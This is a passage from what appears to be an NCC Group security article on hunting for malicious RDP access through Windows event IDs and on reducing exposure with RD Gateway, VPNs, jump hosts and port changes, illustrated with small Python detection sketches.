The following query logic can be used. These events contain a few details about RDP connections to a system, so expect a low volume of events:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager

• Event ID = 1149 (RDP connect)
• User = The user that made the RDP connection
• Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient

• Event ID = 1024 (RDP connection attempt)
• Event ID = 1102 (RDP connect)
• Message = The system where the RDP connection originated

Threat Hunting

The event IDs previously mentioned are a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need a way to check each workstation and server for these events in the appropriate log, or use a log management or SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately, the disconnect event will still be in the logs, allowing the investigator to see the source of the RDP disconnect. This disconnect (event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet. NCC Group has investigated many incidents where our customers have had RDP open to the internet only to find that it was actively under attack without the client knowing it or the source of the compromise. Because exposed RDP is so frequently targeted, as the Coveware report shows, the strongest recommendation NCC Group can make for organizations that need RDP for remote desktop functions is to remove it from the internet, secure it, or find an alternative.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role added to a Windows Server that you publish to the internet. It provides RDP access encrypted over SSL (ports TCP 443 and UDP 3391) instead of the RDP protocol over port 3389. The RD Gateway option is more secure than RDP alone, but should still be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to use RDP behind a VPN. If VPN infrastructure is already in place, organizations either already meet this requirement or can easily adjust their firewalls to do so. Organizations should also monitor VPN logins for access attempts and resolve each source IP to its country of origin. Known good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.
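
The known-good address idea can be sketched as a simple filter over VPN login records. Everything named here is an assumption for illustration: the record keys (user, source_ip), the known_good mapping of users to networks, and the function name unexpected_vpn_logins. The addresses come from the reserved documentation ranges.

```python
import ipaddress


def unexpected_vpn_logins(logins, known_good):
    """Return logins whose source IP is outside the user's known-good networks."""
    flagged = []
    for login in logins:
        ip = ipaddress.ip_address(login["source_ip"])
        networks = [
            ipaddress.ip_network(net) for net in known_good.get(login["user"], [])
        ]
        if not any(ip in net for net in networks):
            flagged.append(login)
    return flagged


if __name__ == "__main__":
    known_good = {"alice": ["203.0.113.0/24"]}
    logins = [
        {"user": "alice", "source_ip": "203.0.113.10"},
        {"user": "alice", "source_ip": "198.51.100.7"},
    ]
    for login in unexpected_vpn_logins(logins, known_good):
        print("review:", login)
```

Users with no known-good entry are always flagged, which keeps the default conservative.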

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before connecting to internal systems via RDP. However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as fast as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended as a way to prevent RDP attacks on its own, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture port 3389 attempts. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on a given port, after which an attacker can simply change their target port.
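
A detection along these lines could look like the following sketch, which counts connection attempts to port 3389 per source address once RDP has been moved elsewhere. The record keys (source_ip, dest_port) and the function name default_port_probes are assumptions; in practice this logic would be expressed in the query language of your SIEM.

```python
from collections import Counter

DEFAULT_RDP_PORT = 3389


def default_port_probes(connections, rdp_port):
    """Count attempts against port 3389 per source when RDP listens on another port."""
    if rdp_port == DEFAULT_RDP_PORT:
        # RDP still uses the default port, so these attempts are not a clean signal.
        return Counter()
    return Counter(
        c["source_ip"] for c in connections if c["dest_port"] == DEFAULT_RDP_PORT
    )


if __name__ == "__main__":
    connections = [
        {"source_ip": "198.51.100.7", "dest_port": 3389},
        {"source_ip": "203.0.113.10", "dest_port": 443},
    ]
    print(default_port_probes(connections, rdp_port=50123))
```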